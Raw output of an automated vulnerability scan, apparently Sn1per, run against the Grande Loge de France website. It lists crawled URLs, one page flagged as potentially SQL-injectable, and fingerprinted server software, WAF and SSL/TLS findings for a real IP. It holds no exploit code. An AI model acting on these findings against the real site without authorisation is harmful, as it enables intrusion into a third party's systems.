1282. |_[ + ] [ 57 / 100 ]-[17:15:16] [ - ] 
1283. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/enjeux-perspectives-condorcet-brossolette/ ]
1284. |_[ + ] Exploit:: 
1285. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1286. |_[ + ] More details::  / - / , ISP: 
1287. |_[ + ] Found:: UNIDENTIFIED
1288. 
1289.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1290. |_[ + ] [ 58 / 100 ]-[17:15:18] [ - ] 
1291. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/gldf-et-vous/newsletter.html ]
1292. |_[ + ] Exploit:: 
1293. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1294. |_[ + ] More details::  / - / , ISP: 
1295. |_[ + ] Found:: UNIDENTIFIED
1296. 
1297.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1298. |_[ + ] [ 59 / 100 ]-[17:15:19] [ - ] 
1299. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/conferences-publiques/en-province.html ]
1300. |_[ + ] Exploit:: 
1301. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1302. |_[ + ] More details::  / - / , ISP: 
1303. |_[ + ] Found:: UNIDENTIFIED
1304. 
1305.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1306. |_[ + ] [ 60 / 100 ]-[17:15:20] [ - ] 
1307. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/enjeux-perspectives-condorcet-brossolette/agenda/ ]
1308. |_[ + ] Exploit:: 
1309. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1310. |_[ + ] More details::  / - / , ISP: 
1311. |_[ + ] Found:: UNIDENTIFIED
1312. 
1313.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1314. |_[ + ] [ 61 / 100 ]-[17:15:22] [ ! ] 
1315. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  https://www.gldf.org/actualites-et-evenements-publics/salon-maconnique-des-arts.html ]
1316. |_[ + ] Exploit:: 
1317. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1318. |_[ + ] More details::  / - / , ISP: 
1319. |_[ + ] Found::  POSTGRESQL-06 - VALUE: pg_
1320. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-gldf.org.txt
1321. 
1322.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1323. |_[ + ] [ 62 / 100 ]-[17:15:23] [ - ] 
1324. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/presentation-du-mab/les-expositions.html ]
1325. |_[ + ] Exploit:: 
1326. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1327. |_[ + ] More details::  / - / , ISP: 
1328. |_[ + ] Found:: UNIDENTIFIED
1329. 
1330.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1331. |_[ + ] [ 63 / 100 ]-[17:15:24] [ - ] 
1332. |_[ + ] Target:: [ https://www.gldf.org/gldf-obedience-maconnique/gldf-qui-sommes-nous/linstitution.html ]
1333. |_[ + ] Exploit:: 
1334. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1335. |_[ + ] More details::  / - / , ISP: 
1336. |_[ + ] Found:: UNIDENTIFIED
1337. 
1338.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1339. |_[ + ] [ 64 / 100 ]-[17:15:25] [ - ] 
1340. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/patrimoine/videos-ceremonie-pierre-brossolette.html ]
1341. |_[ + ] Exploit:: 
1342. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1343. |_[ + ] More details::  / - / , ISP: 
1344. |_[ + ] Found:: UNIDENTIFIED
1345. 
1346.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1347. |_[ + ] [ 65 / 100 ]-[17:15:26] [ - ] 
1348. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/patrimoine/le-temple-franklin-roosevelt.html ]
1349. |_[ + ] Exploit:: 
1350. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1351. |_[ + ] More details::  / - / , ISP: 
1352. |_[ + ] Found:: UNIDENTIFIED
1353. 
1354.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1355. |_[ + ] [ 66 / 100 ]-[17:15:28] [ - ] 
1356. |_[ + ] Target:: [ https://www.gldf.org/gldf-obedience-maconnique/gldf-une-fraternite-en-action.html ]
1357. |_[ + ] Exploit:: 
1358. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1359. |_[ + ] More details::  / - / , ISP: 
1360. |_[ + ] Found:: UNIDENTIFIED
1361. 
1362.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1363. |_[ + ] [ 67 / 100 ]-[17:15:29] [ - ] 
1364. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/devenir-membre-de-la-gldf.html ]
1365. |_[ + ] Exploit:: 
1366. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1367. |_[ + ] More details::  / - / , ISP: 
1368. |_[ + ] Found:: UNIDENTIFIED
1369. 
1370.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1371. |_[ + ] [ 68 / 100 ]-[17:15:30] [ - ] 
1372. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/fonds-darchives-de-la-gldf.html ]
1373. |_[ + ] Exploit:: 
1374. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1375. |_[ + ] More details::  / - / , ISP: 
1376. |_[ + ] Found:: UNIDENTIFIED
1377. 
1378.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1379. |_[ + ] [ 69 / 100 ]-[17:15:31] [ - ] 
1380. |_[ + ] Target:: [ https://www.gldf.org/actualites-et-evenements-publics/actualites/fiche-actualite/?tx_dkactus_pi1_uid=213 ]
1381. |_[ + ] Exploit:: 
1382. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1383. |_[ + ] More details::  / - / , ISP: 
1384. |_[ + ] Found:: UNIDENTIFIED
1385. 
1386.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1387. |_[ + ] [ 70 / 100 ]-[17:15:33] [ - ] 
1388. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne/produit/item/n-117.html ]
1389. |_[ + ] Exploit:: 
1390. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1391. |_[ + ] More details::  / - / , ISP: 
1392. |_[ + ] Found:: UNIDENTIFIED
1393. 
1394.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1395. |_[ + ] [ 71 / 100 ]-[17:15:34] [ - ] 
1396. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=4&cHash=10d9384bbf17b9e5aa9f6c3df5349b72 ]
1397. |_[ + ] Exploit:: 
1398. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1399. |_[ + ] More details::  / - / , ISP: 
1400. |_[ + ] Found:: UNIDENTIFIED
1401. 
1402.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1403. |_[ + ] [ 72 / 100 ]-[17:15:35] [ - ] 
1404. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=8&cHash=ed088174dd2ef1eed1b1e39a0bd7100a ]
1405. |_[ + ] Exploit:: 
1406. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1407. |_[ + ] More details::  / - / , ISP: 
1408. |_[ + ] Found:: UNIDENTIFIED
1409. 
1410.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1411. |_[ + ] [ 73 / 100 ]-[17:15:36] [ - ] 
1412. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=11&cHash=a09fc2fc6c256229b1b8be07655be1a7 ]
1413. |_[ + ] Exploit:: 
1414. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1415. |_[ + ] More details::  / - / , ISP: 
1416. |_[ + ] Found:: UNIDENTIFIED
1417. 
1418.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1419. |_[ + ] [ 74 / 100 ]-[17:15:38] [ - ] 
1420. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne/points-de-vue-initiatiques.html ]
1421. |_[ + ] Exploit:: 
1422. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1423. |_[ + ] More details::  / - / , ISP: 
1424. |_[ + ] Found:: UNIDENTIFIED
1425. 
1426.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1427. |_[ + ] [ 75 / 100 ]-[17:15:39] [ - ] 
1428. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos/videos-annee-2017-2018.html ]
1429. |_[ + ] Exploit:: 
1430. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1431. |_[ + ] More details::  / - / , ISP: 
1432. |_[ + ] Found:: UNIDENTIFIED
1433. 
1434.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1435. |_[ + ] [ 76 / 100 ]-[17:15:40] [ - ] 
1436. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/pvi-revue-de-la-gldf/decouvrir-pvi.html ]
1437. |_[ + ] Exploit:: 
1438. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1439. |_[ + ] More details::  / - / , ISP: 
1440. |_[ + ] Found:: UNIDENTIFIED
1441. 
1442.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1443. |_[ + ] [ 77 / 100 ]-[17:15:41] [ - ] 
1444. |_[ + ] Target:: [ https://www.gldf.org/gldf-obedience-maconnique/gldf-une-fraternite-en-action/mathusalem.html ]
1445. |_[ + ] Exploit:: 
1446. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1447. |_[ + ] More details::  / - / , ISP: 
1448. |_[ + ] Found:: UNIDENTIFIED
1449. 
1450.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1451. |_[ + ] [ 78 / 100 ]-[17:15:43] [ - ] 
1452. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/presentation-du-mab/apercu-des-collections.html ]
1453. |_[ + ] Exploit:: 
1454. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1455. |_[ + ] More details::  / - / , ISP: 
1456. |_[ + ] Found:: UNIDENTIFIED
1457. 
1458.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1459. |_[ + ] [ 79 / 100 ]-[17:15:44] [ - ] 
1460. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne/produit/item/dec2013n-170.html ]
1461. |_[ + ] Exploit:: 
1462. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1463. |_[ + ] More details::  / - / , ISP: 
1464. |_[ + ] Found:: UNIDENTIFIED
1465. 
1466.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1467. |_[ + ] [ 80 / 100 ]-[17:15:45] [ - ] 
1468. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/presentation-du-mab/presentation-des-collections.html ]
1469. |_[ + ] Exploit:: 
1470. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1471. |_[ + ] More details::  / - / , ISP: 
1472. |_[ + ] Found:: UNIDENTIFIED
1473. 
1474.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1475. |_[ + ] [ 81 / 100 ]-[17:15:46] [ - ] 
1476. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/photos.html?page=4&cHash=10d9384bbf17b9e5aa9f6c3df5349b72 ]
1477. |_[ + ] Exploit:: 
1478. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1479. |_[ + ] More details::  / - / , ISP: 
1480. |_[ + ] Found:: UNIDENTIFIED
1481. 
1482.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1483. |_[ + ] [ 82 / 100 ]-[17:15:48] [ - ] 
1484. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/pvi-revue-de-la-gldf/pvi-audio.html ]
1485. |_[ + ] Exploit:: 
1486. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1487. |_[ + ] More details::  / - / , ISP: 
1488. |_[ + ] Found:: UNIDENTIFIED
1489. 
1490.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1491. |_[ + ] [ 83 / 100 ]-[17:15:49] [ - ] 
1492. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/fonds-darchives-de-la-gldf/documents.html ]
1493. |_[ + ] Exploit:: 
1494. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1495. |_[ + ] More details::  / - / , ISP: 
1496. |_[ + ] Found:: UNIDENTIFIED
1497. 
1498.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1499. |_[ + ] [ 84 / 100 ]-[17:15:50] [ - ] 
1500. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=7&cHash=87005bbb58872fa0a5f248f70f5608f4 ]
1501. |_[ + ] Exploit:: 
1502. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1503. |_[ + ] More details::  / - / , ISP: 
1504. |_[ + ] Found:: UNIDENTIFIED
1505. 
1506.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1507. |_[ + ] [ 85 / 100 ]-[17:15:51] [ - ] 
1508. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=14&cHash=383d0933aa5ee95a8b933fef1b445bc5 ]
1509. |_[ + ] Exploit:: 
1510. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1511. |_[ + ] More details::  / - / , ISP: 
1512. |_[ + ] Found:: UNIDENTIFIED
1513. 
1514.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1515. |_[ + ] [ 86 / 100 ]-[17:15:52] [ - ] 
1516. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=10&cHash=2c379a76e295b2dc7643ac0132d59fdf ]
1517. |_[ + ] Exploit:: 
1518. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1519. |_[ + ] More details::  / - / , ISP: 
1520. |_[ + ] Found:: UNIDENTIFIED
1521. 
1522.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1523. |_[ + ] [ 87 / 100 ]-[17:15:54] [ - ] 
1524. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/patrimoine/le-grand-temple-pierre-brossolette.html ]
1525. |_[ + ] Exploit:: 
1526. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1527. |_[ + ] More details::  / - / , ISP: 
1528. |_[ + ] Found:: UNIDENTIFIED
1529. 
1530.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1531. |_[ + ] [ 88 / 100 ]-[17:15:55] [ - ] 
1532. |_[ + ] Target:: [ https://www.gldf.org/culture-et-patrimoine/presentation-du-mab/mab-expositions-exterieures.html ]
1533. |_[ + ] Exploit:: 
1534. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1535. |_[ + ] More details::  / - / , ISP: 
1536. |_[ + ] Found:: UNIDENTIFIED
1537. 
1538.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1539. |_[ + ] [ 89 / 100 ]-[17:15:56] [ - ] 
1540. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/les-questions-que-vous-vous-posez.html ]
1541. |_[ + ] Exploit:: 
1542. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1543. |_[ + ] More details::  / - / , ISP: 
1544. |_[ + ] Found:: UNIDENTIFIED
1545. 
1546.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1547. |_[ + ] [ 90 / 100 ]-[17:15:57] [ - ] 
1548. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=6&cHash=9e833d5b057c1db1b40e3e5325b72837 ]
1549. |_[ + ] Exploit:: 
1550. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1551. |_[ + ] More details::  / - / , ISP: 
1552. |_[ + ] Found:: UNIDENTIFIED
1553. 
1554.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1555. |_[ + ] [ 91 / 100 ]-[17:15:59] [ - ] 
1556. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=16&cHash=b51954e0d9bc1d9e613ee15300a54f45 ]
1557. |_[ + ] Exploit:: 
1558. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1559. |_[ + ] More details::  / - / , ISP: 
1560. |_[ + ] Found:: UNIDENTIFIED
1561. 
1562.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1563. |_[ + ] [ 92 / 100 ]-[17:16:00] [ - ] 
1564. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=15&cHash=0e1c930b0a96f5488a6039dc3bb20e21 ]
1565. |_[ + ] Exploit:: 
1566. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1567. |_[ + ] More details::  / - / , ISP: 
1568. |_[ + ] Found:: UNIDENTIFIED
1569. 
1570.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1571. |_[ + ] [ 93 / 100 ]-[17:16:01] [ - ] 
1572. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=9&cHash=1249e09287658e86a1256f996eeb8290 ]
1573. |_[ + ] Exploit:: 
1574. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1575. |_[ + ] More details::  / - / , ISP: 
1576. |_[ + ] Found:: UNIDENTIFIED
1577. 
1578.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1579. |_[ + ] [ 94 / 100 ]-[17:16:02] [ - ] 
1580. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=3&cHash=d46aff65f0949857ea4d7da609237201 ]
1581. |_[ + ] Exploit:: 
1582. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1583. |_[ + ] More details::  / - / , ISP: 
1584. |_[ + ] Found:: UNIDENTIFIED
1585. 
1586.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1587. |_[ + ] [ 95 / 100 ]-[17:16:03] [ - ] 
1588. |_[ + ] Target:: [ https://www.gldf.org/editions-publications/boutique-en-ligne/produit/item/pvi-184.html ]
1589. |_[ + ] Exploit:: 
1590. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1591. |_[ + ] More details::  / - / , ISP: 
1592. |_[ + ] Found:: UNIDENTIFIED
1593. 
1594.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1595. |_[ + ] [ 96 / 100 ]-[17:16:05] [ - ] 
1596. |_[ + ] Target:: [ https://www.gldf.org/gldf-obedience-maconnique/gldf-une-fraternite-en-action/entraide-fraternelle/ ]
1597. |_[ + ] Exploit:: 
1598. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1599. |_[ + ] More details::  / - / , ISP: 
1600. |_[ + ] Found:: UNIDENTIFIED
1601. 
1602.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1603. |_[ + ] [ 97 / 100 ]-[17:16:06] [ - ] 
1604. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=2&cHash=fc952c515cc9eec39e9d4a55a654675b ]
1605. |_[ + ] Exploit:: 
1606. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1607. |_[ + ] More details::  / - / , ISP: 
1608. |_[ + ] Found:: UNIDENTIFIED
1609. 
1610.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1611. |_[ + ] [ 98 / 100 ]-[17:16:07] [ - ] 
1612. |_[ + ] Target:: [ https://www.gldf.org/gldf-obedience-maconnique/gldf-qui-sommes-nous/nos-valeurs.html ]
1613. |_[ + ] Exploit:: 
1614. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1615. |_[ + ] More details::  / - / , ISP: 
1616. |_[ + ] Found:: UNIDENTIFIED
1617. 
1618.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1619. |_[ + ] [ 99 / 100 ]-[17:16:08] [ - ] 
1620. |_[ + ] Target:: [ https://www.gldf.org/devenir-franc-macon/mediatheque/videos.html?page=5&cHash=576f584c6c1d2667d3b5cbea170a4897 ]
1621. |_[ + ] Exploit:: 
1622. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.22 (Debian) , IP:51.254.204.201:443 
1623. |_[ + ] More details::  / - / , ISP: 
1624. |_[ + ] Found:: UNIDENTIFIED
1625.  
1626. [ INFO ] [ Shutting down ]
1627. [ INFO ] [ End of process INURLBR at [05-01-2018 17:16:08]
1628. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 2 ]
1629. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-gldf.org.txt ]
1630. |_________________________________________________________________________________________
1631. https://www.gldf.org/uploads/tx_dklikbrochures/DP_GLDF.pdf
1632. https://www.gldf.org/actualites-et-evenements-publics/salon-maconnique-des-arts.html
1633.  
1634. \_________________________________________________________________________________________/
1635.  
1636.  + -- --=[Port 110 closed... skipping.
1637.  + -- --=[Port 111 closed... skipping.
1638.  + -- --=[Port 135 closed... skipping.
1639.  + -- --=[Port 139 closed... skipping.
1640.  + -- --=[Port 161 closed... skipping.
1641.  + -- --=[Port 162 closed... skipping.
1642.  + -- --=[Port 389 closed... skipping.
1643.  + -- --=[Port 443 opened... running tests...
1644.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
1645.  
1646. ^ ^
1647. _ __ _ ____ _ __ _ _ ____
1648. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1649. | V V // o // _/ | V V // 0 // 0 // _/
1650. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1651. <
1652. ...'
1653.  
1654. WAFW00F - Web Application Firewall Detection Tool
1655.  
1656. By Sandro Gauci && Wendel G. Henrique
1657.  
1658. Checking https://gldf.org
1659.  
1660.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
1661. ____ _ _ _____ _ _
1662. / ___| | ___ _ _ __| | ___|_ _(_) |
1663. | | | |/ _ \| | | |/ _` | |_ / _` | | |
1664. | |___| | (_) | |_| | (_| | _| (_| | | |
1665. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
1666. v1.0.1 by m0rtem
1667.  
1668.  
1669. [17:16:11] Initializing CloudFail - the date is: 05/01/2018
1670. [17:16:11] Fetching initial information from: gldf.org...
1671. [17:16:11] Server IP: 51.254.204.201
1672. [17:16:11] Testing if gldf.org is on the Cloudflare network...
1673. [17:16:11] gldf.org is not part of the Cloudflare network, quitting...
1674.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
1675. https://gldf.org [301 Moved Permanently] Apache[2.2.22], Country[UNITED KINGDOM][GB], HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[51.254.204.201], RedirectLocation[https://www.gldf.org/]
1676. https://www.gldf.org/ [200 OK] Apache[2.2.22], Country[UNITED KINGDOM][GB], Google-Analytics[UA-3901121-1], HTML5, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[51.254.204.201], JQuery[1.8.3], MetaGenerator[TYPO3 CMS], Modernizr, PoweredBy[TYPO3], Script[text/javascript], probably TYPO3, Title[Franc-Maçonnerie en Grande Loge De France - Accueil]
1677.  
1678.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
1679.  
1680.  
1681.  
1682. AVAILABLE PLUGINS
1683. -----------------
1684.  
1685. PluginHSTS
1686. PluginHeartbleed
1687. PluginSessionRenegotiation
1688. PluginChromeSha1Deprecation
1689. PluginCompression
1690. PluginSessionResumption
1691. PluginCertInfo
1692. PluginOpenSSLCipherSuites
1693.  
1694.  
1695.  
1696. CHECKING HOST(S) AVAILABILITY
1697. -----------------------------
1698.  
1699. gldf.org:443 => 51.254.204.201:443
1700.  
1701.  
1702.  
1703. SCAN RESULTS FOR GLDF.ORG:443 - 51.254.204.201:443
1704. --------------------------------------------------
1705.  
1706. * Deflate Compression:
1707. OK - Compression disabled
1708.  
1709. * Session Renegotiation:
1710. Client-initiated Renegotiations: OK - Rejected
1711. Secure Renegotiation: OK - Supported
1712.  
1713. * Certificate - Content:
1714. SHA1 Fingerprint: e3cbe73ce7e282bf59f838cf1a942cc4ecb8fb09
1715. Common Name: www.gldf.org
1716. Issuer: RapidSSL SHA256 CA
1717. Serial Number: 74E36BEF6E2CAC3E5116A2512119FF3F
1718. Not Before: Apr 14 00:00:00 2016 GMT
1719. Not After: Apr 14 23:59:59 2018 GMT
1720. Signature Algorithm: sha256WithRSAEncryption
1721. Public Key Algorithm: rsaEncryption
1722. Key Size: 2048 bit
1723. Exponent: 65537 (0x10001)
1724. X509v3 Subject Alternative Name: {'DNS': ['www.gldf.org', 'gldf.org']}
1725.  
1726. * Certificate - Trust:
1727. Hostname Validation: OK - Subject Alternative Name matches
1728. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1729. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1730. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1731. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1732. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1733. Certificate Chain Received: ['www.gldf.org']
1734.  
1735. * Certificate - OCSP Stapling:
1736. NOT SUPPORTED - Server did not send back an OCSP response.
1737.  
1738. * Session Resumption:
1739. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1740. With TLS Session Tickets: OK - Supported
1741.  
1742. * SSLV2 Cipher Suites:
1743. Server rejected all cipher suites.
1744.  
1745. * SSLV3 Cipher Suites:
1746. Server rejected all cipher suites.
1747.  
1748.  
1749.  
1750. SCAN COMPLETED IN 2.15 S
1751. ------------------------
1752. Version: 1.11.10-static
1753. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1754. 
1755. Testing SSL server gldf.org on port 443 using SNI name gldf.org
1756.  
1757. TLS Fallback SCSV:
1758. Server supports TLS Fallback SCSV
1759.  
1760. TLS renegotiation:
1761. Secure session renegotiation supported
1762.  
1763. TLS Compression:
1764. Compression disabled
1765.  
1766. Heartbleed:
1767. TLS 1.2 not vulnerable to heartbleed
1768. TLS 1.1 not vulnerable to heartbleed
1769. TLS 1.0 not vulnerable to heartbleed
1770.  
1771. Supported Server Cipher(s):
1772. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
1773. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1774. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1775. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1776. Accepted TLSv1.2 256 bits AES256-SHA256
1777. Accepted TLSv1.2 256 bits AES256-SHA
1778. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
1779. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
